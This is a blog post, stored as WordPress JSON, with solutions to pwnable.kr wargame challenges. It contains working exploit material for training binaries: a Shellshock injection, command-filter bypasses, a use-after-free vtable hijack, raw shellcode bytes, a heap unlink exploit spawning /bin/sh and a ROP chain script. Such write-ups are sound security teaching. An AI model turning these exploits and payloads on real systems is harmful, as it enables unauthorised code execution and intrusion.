{"id":1658,"date":"2021-09-08T21:28:30","date_gmt":"2021-09-08T13:28:30","guid":{"rendered":"https:\/\/flandre-scarlet.moe\/blog\/?p=1658"},"modified":"2021-09-08T21:39:56","modified_gmt":"2021-09-08T13:39:56","slug":"pwnable-kr-%e7%bb%83%e4%b9%a0%ef%bc%88%e4%ba%8c%ef%bc%89","status":"publish","type":"post","link":"https:\/\/flandre-scarlet.moe\/blog\/1658\/","title":{"rendered":"pwnable.kr Exercises (Part 2)"},"content":{"rendered":"<h1>Toddler&#8217;s Bottle<\/h1>\n<h2>leg<\/h2>\n<p>The key is how pc is computed. Unlike x86, where pc always holds the address of the next instruction, on ARM pc points two instructions ahead. If the current instruction is at address x, then<\/p>\n<ul>\n<li>ARM mode: pc = x + 8<\/li>\n<li>Thumb mode: pc = x + 4<\/li>\n<\/ul>\n<p>Applying this rule gives key1() + key2() + key3() = 0x8ce4 + 0x8d0c + 0x8d80 = 0x1A770; just enter it (in decimal):<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">108400<\/pre>\n<h2>mistake<\/h2>\n<p>Because of an operator precedence bug, fd is assigned 0, i.e. stdin, so the password file never comes into play. You can enter:<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">1111111111\r\n0000000000<\/pre>\n<h2>shellshock<\/h2>\n<p>This challenge is based on the arbitrary command execution vulnerability in bash; quoted from <a href=\"https:\/\/en.wikipedia.org\/wiki\/Shellshock_(software_bug)\" rel=\"noopener\" target=\"_blank\">Wikipedia<\/a>:<\/p>\n<blockquote><p>\nInitial report (CVE-2014-6271)<br \/>\nThis original form of the vulnerability (CVE-2014-6271) involves a specially crafted environment variable containing an exported function definition, followed 
by arbitrary commands. Bash incorrectly executes the trailing commands when it imports the function. The vulnerability can be tested with the following command:<br \/>\nenv x='() { :;}; echo vulnerable' bash -c &quot;echo this is a test&quot;<br \/>\nIn systems affected by the vulnerability, the above commands will display the word &quot;vulnerable&quot; as a result of Bash executing the command &quot;echo vulnerable&quot;, which was embedded into the specially crafted environment variable named &quot;x&quot;.<\/p><\/blockquote>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">env x='() { :;}; \/bin\/cat flag'  .\/shellshock<\/pre>\n<h2>coin1<\/h2>\n<p>A fairly straightforward algorithm problem? Just do what the challenge says: handle the I\/O with pwntools, then ssh in and run the script from there.<\/p>\n<pre class=\"brush: python; title: ; notranslate\" title=\"\">from pwn import *\r\nimport re\r\n\r\ndef weigh(conn, s, e):\r\n    # weigh the coins s..e (inclusive); the server answers with their total weight\r\n    coin_list = &#x5B;str(i) for i in range(s, e + 1)]\r\n    conn.sendline(&quot; &quot;.join(coin_list).encode())\r\n    output = conn.recvline().decode()\r\n    result = re.search(r&quot;(\\d+)&quot;, output)\r\n    assert result is not None\r\n    return int(result.group(1))\r\n\r\ndef guess(conn, N, C):\r\n    # binary search over the coin indices: a real coin weighs 10, the counterfeit 9,\r\n    # so a batch of k real coins weighs exactly k * 10\r\n    s = 0\r\n    e = N - 1\r\n    for i in range(C):\r\n        m = (s + e) \/\/ 2\r\n        w = weigh(conn, s, m)\r\n        if w == (m - s + 1) * 10:   # all real: the counterfeit is in the right half\r\n            s = m + 1\r\n        else:\r\n            e = m\r\n    return (s + e) \/\/ 2\r\n\r\ndef main():\r\n    context.log_level = 'debug'\r\n    conn = remote('pwnable.kr', 9007)\r\n    conn.recvuntil(b'Ready')\r\n    try:\r\n        while True:\r\n            output = 
conn.recvline_regex(rb'N=(\\d+) C=(\\d+)').decode()\r\n            n, c = re.search(r'N=(\\d+) C=(\\d+)', output).groups()\r\n            answer = guess(conn, int(n), int(c))\r\n            conn.sendline(str(answer).encode())\r\n            conn.recvuntil(b'Correct!')\r\n    except EOFError:\r\n        pass   # after the last round the server prints the flag (see the debug log) and closes\r\n\r\nmain()<\/pre>\n<h2>blackjack<\/h2>\n<p>A link to a page with the source is given; the page is dead, but it can still be found on the <a href=\"https:\/\/web.archive.org\/web\/20201026050544\/http:\/\/cboard.cprogramming.com\/c-programming\/114023-simple-blackjack-program.html\" rel=\"noopener\" target=\"_blank\">Wayback Machine<\/a>. Dig through that pile of code and you will find the problematic function:<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">int betting() { \/\/Asks user amount to bet\r\n  printf(&quot;\\n\\nEnter Bet: $&quot;);\r\n  scanf(&quot;%d&quot;, &amp;bet);\r\n  if (bet &gt; cash) { \/\/If player tries to bet more money than player has\r\n    printf(&quot;\\nYou cannot bet more money than you have.&quot;);\r\n    printf(&quot;\\nEnter Bet: &quot;);\r\n    scanf(&quot;%d&quot;, &amp;bet);   \/\/ the second bet is returned without being checked again\r\n    return bet;\r\n  }\r\n  else\r\n    return bet;\r\n} \/\/ End Function<\/pre>\n<p>Notice that the bet entered the second time is returned without any validation. So once in the game, bet 1000000; when that is rejected, enter 1000000 again, then win a hand and you are done. Entering -1000000 and then losing works as well...<\/p>\n<h2>lotto<\/h2>\n<p>The rules sound rather mysterious, but the two for loops in the code give it away... At first I even wondered whether urandom 
had some bug. As long as your input matches any one of the six random bytes you clear the round, and the values are already narrowed down to 1~45, so just try a few times...<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">int match = 0, j = 0;\r\n\/\/ every submitted byte is compared against every drawn byte, so six copies of one\r\n\/\/ value that equals a single drawn byte already reach match == 6\r\nfor(i=0; i&lt;6; i++){\r\n  for(j=0; j&lt;6; j++){\r\n    if(lotto&#x5B;i] == submit&#x5B;j]){\r\n      match++;\r\n    }\r\n  }\r\n}<\/pre>\n<pre class=\"brush: python; title: ; notranslate\" title=\"\">from pwn import *\r\n\r\ncontext.log_level = 'debug'\r\nconn = process('\/home\/lotto\/lotto')\r\nconn.recvuntil(b'3. Exit')\r\nwhile True:\r\n    conn.sendline(b'1')\r\n    conn.recvuntil(b'Submit your 6 lotto bytes :')\r\n    conn.send(b' ' * 6)   # six times the fun: 0x20 = 32 repeated, within 1~45\r\n    out = conn.recvuntil(b'bad luck...', timeout=3)\r\n    if not out:   # no &quot;bad luck...&quot; this time: the flag was printed instead\r\n        print(conn.recv(timeout=1))\r\n        break<\/pre>\n<h2>cmd1<\/h2>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\/\/ challenge source: PATH is clobbered and argv[1] reaches system() after a substring filter\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;string.h&gt;\r\nint filter(char* cmd){\r\n        int r=0;\r\n        r += strstr(cmd, &quot;flag&quot;)!=0;\r\n        r += strstr(cmd, &quot;sh&quot;)!=0;\r\n        r += strstr(cmd, &quot;tmp&quot;)!=0;\r\n        return r;\r\n}\r\nint main(int argc, char* argv&#x5B;], char** envp){\r\n        putenv(&quot;PATH=\/thankyouverymuch&quot;);\r\n        if(filter(argv&#x5B;1])) return 0;\r\n        system( argv&#x5B;1] );\r\n        return 0;\r\n}<\/pre>\n<p>Go to some directory under \/tmp and create a symbolic link:<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">ln -s \/home\/cmd1\/flag f<\/pre>\n<p>Then run:<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">~\/cmd1 &quot;\/bin\/cat f&quot;<\/pre>\n<p>And that's it...<\/p>\n<h2>cmd2<\/h2>\n<pre class=\"brush: cpp; title: ; notranslate\" 
title=\"\">\/\/ challenge source: the environment is wiped before the filter and system() call\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;string.h&gt;\r\nint filter(char* cmd){\r\n        int r=0;\r\n        r += strstr(cmd, &quot;=&quot;)!=0;\r\n        r += strstr(cmd, &quot;PATH&quot;)!=0;\r\n        r += strstr(cmd, &quot;export&quot;)!=0;\r\n        r += strstr(cmd, &quot;\/&quot;)!=0;\r\n        r += strstr(cmd, &quot;`&quot;)!=0;\r\n        r += strstr(cmd, &quot;flag&quot;)!=0;\r\n        return r;\r\n}\r\nextern char** environ;\r\nvoid delete_env(){\r\n        char** p;\r\n        for(p=environ; *p; p++) memset(*p, 0, strlen(*p));\r\n}\r\nint main(int argc, char* argv&#x5B;], char** envp){\r\n        delete_env();\r\n        putenv(&quot;PATH=\/no_command_execution_until_you_become_a_hacker&quot;);\r\n        if(filter(argv&#x5B;1])) return 0;\r\n        printf(&quot;%s\\n&quot;, argv&#x5B;1]);\r\n        system( argv&#x5B;1] );\r\n        return 0;\r\n}<\/pre>\n<p>A step further than cmd1: every environment variable of the process is wiped, which forces you to spell out the path separator. But the code also blocks passing '\/' directly, so you have to think about escape sequences and the like: encode '\/' and let printf emit it. As before, first create a symbolic link to the flag file under \/tmp:<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">~\/cmd2 &quot;\\$(printf '\\057bin\\057cat \\057tmp\\057subdir\\057f')&quot;<\/pre>\n<p>Here \\057 is the octal encoding of '\/', and the backslash in front of $ keeps the $ 
intact during the first round of execution.<\/p>\n<h2>uaf<\/h2>\n<p>It does not look like a heap overflow. So the plan is to free the objects m and w first, then allocate memory for data so that data lands at the same address as m, and then trigger m->introduce().<br \/>\nOf course the contents of data have to be crafted too, and that is where the vtable comes in.<br \/>\nThe space allocated for m in the binary is 0x18 bytes; testing shows that as long as the size requested for data does not exceed 0x18, the second new returns the same address as m (after m has been deleted, of course). Step one done.<br \/>\nCalling m->introduce() first loads the vtable address from *m. Looking at the class definition, introduce is the second entry in the table, so what actually happens is: fetch *m (the address of the Man vtable), then take *m + sizeof(void*) * 2 as the address of introduce. So if we move the pointer to the vtable back a bit, it becomes (*m &#8211; sizeof(void*)) + sizeof(void*) * 2, and what is meant to be a call to introduce lands in give_shell instead, because give_shell is the first entry in the table. Since *m is fixed at 0x401570, writing 0x401568 does the job.<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">printf &quot;\\x68\\x15\\x40\\x00&quot; &gt; \/tmp\/in.txt\r\n.\/uaf 
24 \/tmp\/in.txt\r\n3  # trigger delete\r\n2\r\n2  # new twice\r\n1  # call &quot;introduce&quot;<\/pre>\n<h2>memcpy<\/h2>\n<p>Following the hints and trying it, the program crashes. A closer look shows the cause is an SSE instruction hitting a memory address that is not 16-byte aligned, so the address malloc returns for dest must be 16-byte aligned. The top of the source helpfully lists the compile options; build a binary with them and experiment. For example, the 4th allocation of 64 bytes is aligned, but the 5th allocation of 128 bytes is not (it turns out to be off by 8 bytes), so make the 4th allocation 64+8 bytes instead, because the heap reserves an extra 8 bytes of control information per chunk; the rest follow the same pattern:<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">8\r\n16\r\n32\r\n72\r\n136\r\n264\r\n520\r\n1032\r\n2056\r\n4096<\/pre>\n<h2>asm<\/h2>\n<p>Write shellcode that reads the flag file using only the open, read and write functions.<br \/>\nThe usable memory region is fixed at 0x41414000~0x41415000.<br \/>\nThe shellcode is written to 0x4141402e~0x41414416 (the read length of 1000 bytes is hard-coded).<br \/>\nThe file name string can follow the shellcode directly, but its offset has to be adjusted to the final shellcode.<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\/\/ 
when actually connecting via nc 0 9026 the path must become &quot;\/home\/asm_pwn\/...&quot;\r\nchar* ppath = \/\/ far too long, wrap it\r\n  &quot;\/home\/asm\/this_is_pwnable.kr_flag_file_please_read_this_file.sorry_&quot;\r\n  &quot;the_file_name_is_very_looooooooooooooooooooooooooooooooooooooooooooooo&quot;\r\n  &quot;ooooooooooooooooooooooooooooo0000000000000000000000000oooooooooooooooo&quot;\r\n  &quot;ooooooo000000000000o0o0o0o0o0o0ong&quot;;\r\n__asm__ __volatile__ (\r\n    &quot;mov $2, %%rax\\n&quot;\r\n    &quot;mov %0, %%rdi\\n&quot;\r\n    &quot;mov $0, %%rsi\\n&quot;\r\n    &quot;syscall\\n&quot;      \/\/ open syscall; ppath is the file path, in the real payload the string follows right after the shellcode\r\n    &quot;mov %%rax, %%rdi\\n&quot;\r\n    &quot;mov $0, %%rax\\n&quot;\r\n    &quot;mov $0x41414400, %%rsi\\n&quot;\r\n    &quot;mov $100, %%rdx\\n&quot;\r\n    &quot;syscall\\n&quot;       \/\/ read 100 bytes into the buffer at 0x41414400\r\n    &quot;mov $1, %%rax\\n&quot;\r\n    &quot;mov $1, %%rdi\\n&quot;\r\n    &quot;mov $0x41414400, %%rsi\\n&quot;\r\n    &quot;mov $100, %%rdx\\n&quot;\r\n    &quot;syscall\\n&quot;      \/\/ write to stdout\r\n    : : &quot;c&quot;(ppath)\r\n    : &quot;rax&quot;, &quot;rdi&quot;, &quot;rsi&quot;, &quot;rdx&quot;, &quot;memory&quot;);   \/\/ registers the syscalls overwrite<\/pre>\n<p>The annoying part: in the asm directory (.\/asm &lt; 1.txt) it already worked, but switching to nc 0 9026 with a pwntools script did not; after a lot of fiddling, a pipe did the trick in the end...<br \/>\nThe bytes below correspond to the assembly above; from<\/p>\n<pre>\\x2F\\x68\\x6F<\/pre>\n<p>onward is the content of the path string. When calling open, rdi 
has to hold the address of that string; as mentioned above the shellcode starts at 0x4141402e, so the actual position of the string can be computed from that.<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\"># Python 2 print writes the bytes verbatim; under Python 3 use sys.stdout.buffer.write(b&quot;...&quot;) instead\r\npython -c 'print(&quot;\\x48\\x8D\\x05\\x57\\x00\\x00\\x00\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x48\\x89\\xC1\\x48\\xC7\\xC0\\x02\\x00\\x00\\x00\\x48\\x89\\xCF\\x48\\xC7\\xC6\\x00\\x00\\x00\\x00\\x0F\\x05\\x48\\x89\\xC7\\x48\\xC7\\xC0\\x00\\x00\\x00\\x00\\x48\\xC7\\xC6\\x00\\x44\\x41\\x41\\x48\\xC7\\xC2\\x64\\x00\\x00\\x00\\x0F\\x05\\x48\\xC7\\xC0\\x01\\x00\\x00\\x00\\x48\\xC7\\xC7\\x01\\x00\\x00\\x00\\x48\\xC7\\xC6\\x00\\x44\\x41\\x41\\x48\\xC7\\xC2\\x64\\x00\\x00\\x00\\x0F\\x05\\xCC\\x2F\\x68\\x6F\\x6D\\x65\\x2F\\x61\\x73\\x6D\\x5F\\x70\\x77\\x6E\\x2F\\x74\\x68\\x69\\x73\\x5F\\x69\\x73\\x5F\\x70\\x77\\x6E\\x61\\x62\\x6C\\x65\\x2E\\x6B\\x72\\x5F\\x66\\x6C\\x61\\x67\\x5F\\x66\\x69\\x6C\\x65\\x5F\\x70\\x6C\\x65\\x61\\x73\\x65\\x5F\\x72\\x65\\x61\\x64\\x5F\\x74\\x68\\x69\\x73\\x5F\\x66\\x69\\x6C\\x65\\x2E\\x73\\x6F\\x72\\x72\\x79\\x5F\\x74\\x68\\x65\\x5F\\x66\\x69\\x6C\\x65\\x5F\\x6E\\x61\\x6D\\x65\\x5F\\x69\\x73\\x5F\\x76\\x65\\x72\\x79\\x5F\\x6C\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x6F\\x30\\x6F\\x30\\x6F\\x30\\x6F\\x30\\x6F\\x30\\x6F\\x30\\x6F\\x6E\\x67\\x00\\x0a&quot;)' &gt; \/tmp\/1.txt\r\ncat \/tmp\/1.txt - | nc 0 9026<\/pre>\n<h2>unlink<\/h2>\n<p>Heap overflow.<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;string.h&gt;\r\ntypedef struct tagOBJ{\r\n    struct tagOBJ* fd;\r\n    struct tagOBJ* bk;\r\n    char buf&#x5B;8];\r\n}OBJ;\r\n\r\nvoid shell(){\r\n    system(&quot;\/bin\/sh&quot;);\r\n}\r\n\r\nvoid unlink(OBJ* P){\r\n    OBJ* BK;\r\n    OBJ* FD;\r\n    BK=P-&gt;bk;\r\n    FD=P-&gt;fd;\r\n    FD-&gt;bk=BK;\r\n    BK-&gt;fd=FD;\r\n}\r\n\r\nint main(int argc, char* argv&#x5B;]){\r\n    malloc(1024);\r\n    OBJ* A = (OBJ*)malloc(sizeof(OBJ));\r\n    OBJ* B = (OBJ*)malloc(sizeof(OBJ));\r\n    OBJ* C = (OBJ*)malloc(sizeof(OBJ));\r\n\r\n    \/\/ double linked list: A &lt;-&gt; B &lt;-&gt; C\r\n    A-&gt;fd = B;\r\n    B-&gt;bk = A;\r\n    B-&gt;fd = C;\r\n    C-&gt;bk = B;\r\n\r\n    printf(&quot;here is stack address leak: %p\\n&quot;, &amp;A);\r\n    printf(&quot;here is heap address leak: %p\\n&quot;, A);\r\n    printf(&quot;now that you have leaks, get shell!\\n&quot;);\r\n    \/\/ heap overflow!\r\n    gets(A-&gt;buf);\r\n    \r\n    \/\/ exploit this unlink!\r\n    unlink(B);\r\n    return 0;\r\n}<\/pre>\n<p>Since unlink touches both the forward and the backward neighbour, setting either BK or FD to the address of shell() raises a write fault in one of FD->bk=BK or BK->fd=FD, because the code segment is not writable. Pointing them at a heap buffer and building a shellcode trampoline there does not work either, because of DEP... I was stuck here for a long time... after all, the only thing in the code that can be hijacked is unlink's ret. 
Only later did I realise that main's ret can be tampered with too.<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\"> ; where main calls unlink\r\n 0x080485ef &lt;+192&gt;:   pushl  -0xc(%ebp)\r\n 0x080485f2 &lt;+195&gt;:   call   0x8048504 &lt;unlink&gt;\r\n 0x080485f7 &lt;+200&gt;:   add    $0x10,%esp\r\n 0x080485fa &lt;+203&gt;:   mov    $0x0,%eax\r\n 0x080485ff &lt;+208&gt;:   mov    -0x4(%ebp),%ecx\r\n 0x08048602 &lt;+211&gt;:   leave\r\n 0x08048603 &lt;+212&gt;:   lea    -0x4(%ecx),%esp\r\n 0x08048606 &lt;+215&gt;:   ret<\/pre>\n<p>After returning from unlink, main goes the long way round: ebp ends up in esp and then it executes ret. That ebp is saved on the stack when unlink is called, which gives us a chance to modify it. The three OBJ objects A, B and C are laid out contiguously on the heap:<\/p>\n<pre>0    4    8       16       24\r\n+----+----+--------+--------+----\r\n| fd | bk | buf    | &lt;heap&gt; | fd\r\n+----+----+--------+--------+----<\/pre>\n<p>The payload, counted from A's buf:<\/p>\n<pre>A+0x8  AAAA\r\nA+0xc  AAAA\r\nA+0x10 AAAA\r\nA+0x14 AAAA\r\nA+0x18 &lt;A's heap address+0x28&gt;    \/\/ start of OBJ B, i.e. B's fd\r\nA+0x1c &lt;A's stack address-0x1c&gt;   \/\/ B's bk\r\nA+0x20 \\xeb\\x84\\x04\\x08\r\nA+0x24 &lt;A's heap address+0x24&gt;\r\nA+0x28 &lt;A's heap address+0x24&gt;<\/pre>\n<p>A's stack address minus 0x1c is exactly where main's ebp is saved inside unlink's frame; \\xeb\\x84\\x04\\x08 is the address of shell(); the last two addresses are used by the two ebp-based hops in main shown above.<\/p>\n<pre class=\"brush: python; title: ; 
notranslate\" title=\"\">from pwn import *\r\nimport re\r\n\r\ncontext.log_level = 'debug'\r\nconn = process('\/home\/unlink\/unlink')\r\nleak = conn.recvuntil(b'get shell!')\r\nstack_addr = int(re.search(rb'stack address leak: 0x(&#x5B;a-f0-9]+)', leak).group(1), 16)\r\nheap_addr = int(re.search(rb'heap address leak: 0x(&#x5B;a-f0-9]+)', leak).group(1), 16)\r\nprint(hex(stack_addr), hex(heap_addr))\r\n\r\nd = b'A' * 16                 # A-&gt;buf plus the chunk header in front of B\r\nd += p32(heap_addr + 0x28)    # B-&gt;fd\r\nd += p32(stack_addr - 0x1c)   # B-&gt;bk: main's saved ebp inside unlink's frame\r\nd += p32(0x80484eb)           # shell()\r\nd += p32(heap_addr + 0x24)\r\nd += p32(heap_addr + 0x24)\r\nconn.sendline(d)\r\nconn.interactive()<\/pre>\n<h2>blukat<\/h2>\n<p>A trick question: the blukat user is already in the blukat_pwn group, so the password file is readable from the start; it is just that the file contents are very misleading... So read it out and type it in; the code even leaves a buffer-overflow decoy on purpose.<\/p>\n<h2>horcruxes<\/h2>\n<p>The code initialises a bunch of random values and then demands an input equal to their sum, which is obviously impossible unless the random number generation is flawed. But there is a seemingly exploitable piece of code in ropme(): overflow, overwrite the function's return address, and jump to the arrow:<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" 
title=\"\">else {\r\n    printf(&quot;How many EXP did you earned? : &quot;);\r\n    gets(s);   \/\/ char s&#x5B;100];\r\n    if ( atoi(s) == sum ) {\r\n=&gt;      fd = open(&quot;flag&quot;, 0);\r\n        s&#x5B;read(fd, s, 0x64u)] = 0;\r\n        puts(s);\r\n        close(fd);\r\n        exit(0);\r\n    }\r\n    puts(&quot;You'd better get more experience to kill Voldemort&quot;);\r\n}<\/pre>\n<p>But in practice, because<\/p>\n<pre>fd = open(\"flag\", 0);<\/pre>\n<p>sits at address 0x80a010b, and the 0a in it is a newline that gets() stops at, that does not work.<br \/>\nConveniently, the code has seven functions A to G that print the value of each random number, and their addresses contain no special characters either, so you can return into each of them in turn, compute sum, and enter it.<\/p>\n<pre class=\"brush: python; title: ; notranslate\" title=\"\"># -*- coding: utf-8 -*-\r\nfrom pwn import *\r\nimport re\r\n\r\ncontext.log_level = 'debug'\r\n#conn = process('\/home\/horcruxes\/horcruxes')\r\nconn = remote('127.0.0.1', 9032)\r\nconn.recvuntil(b'Select Menu:')\r\nconn.sendline(b'0')\r\nconn.recvuntil(b'How many EXP did you earned? 
:')\r\np = b'a' * 120\r\np += p32(0x809fe4b)    # address of A()\r\np += p32(0x809fe6a)    # B\r\np += p32(0x809fe89)    # C\r\np += p32(0x809fea8)    # D\r\np += p32(0x809fec7)    # E\r\np += p32(0x809fee6)    # F\r\np += p32(0x809ff05)    # G\r\np += p32(0x809fffc)    # the call to ropme() in main(), because ropme's entry address contains 0a\r\nconn.sendline(p)\r\n\r\n# A..G each print their value, then ropme() runs again and shows the menu; collect all of it\r\ndata = conn.recvrepeat(3)\r\nprint('data:', data)\r\nexp = re.findall(rb'EXP \\+(-?\\d+)', data)\r\nprint('exp:', exp)\r\ntotal = sum(int(e) for e in exp)\r\ntotal = (total + 2**31) % 2**32 - 2**31   # wrap like the 32-bit int sum in the binary, so atoi() can parse it\r\nprint('sum=', total)\r\nconn.sendline(b'0')\r\nconn.recvuntil(b'How many EXP did you earned? :')\r\nconn.sendline(str(total).encode())\r\nconn.interactive()<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Toddler&#8217;s Bottle leg The key is how pc is computed. Unlike x86, where pc always holds&#8230; <\/p>\n<div class=\"read-more navbutton\"><a href=\"https:\/\/flandre-scarlet.moe\/blog\/1658\/\">Read more<i class=\"fa 
fa-angle-double-right\"><\/i><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[85],"tags":[192,191],"class_list":["post-1658","post","type-post","status-publish","format-standard","hentry","category-programs","tag-pwn","tag-pwnable-kr"],"_links":{"self":[{"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/posts\/1658","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/comments?post=1658"}],"version-history":[{"count":15,"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/posts\/1658\/revisions"}],"predecessor-version":[{"id":1674,"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/posts\/1658\/revisions\/1674"}],"wp:attachment":[{"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/media?parent=1658"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/categories?post=1658"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/flandre-scarlet.moe\/blog\/wp-json\/wp\/v2\/tags?post=1658"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}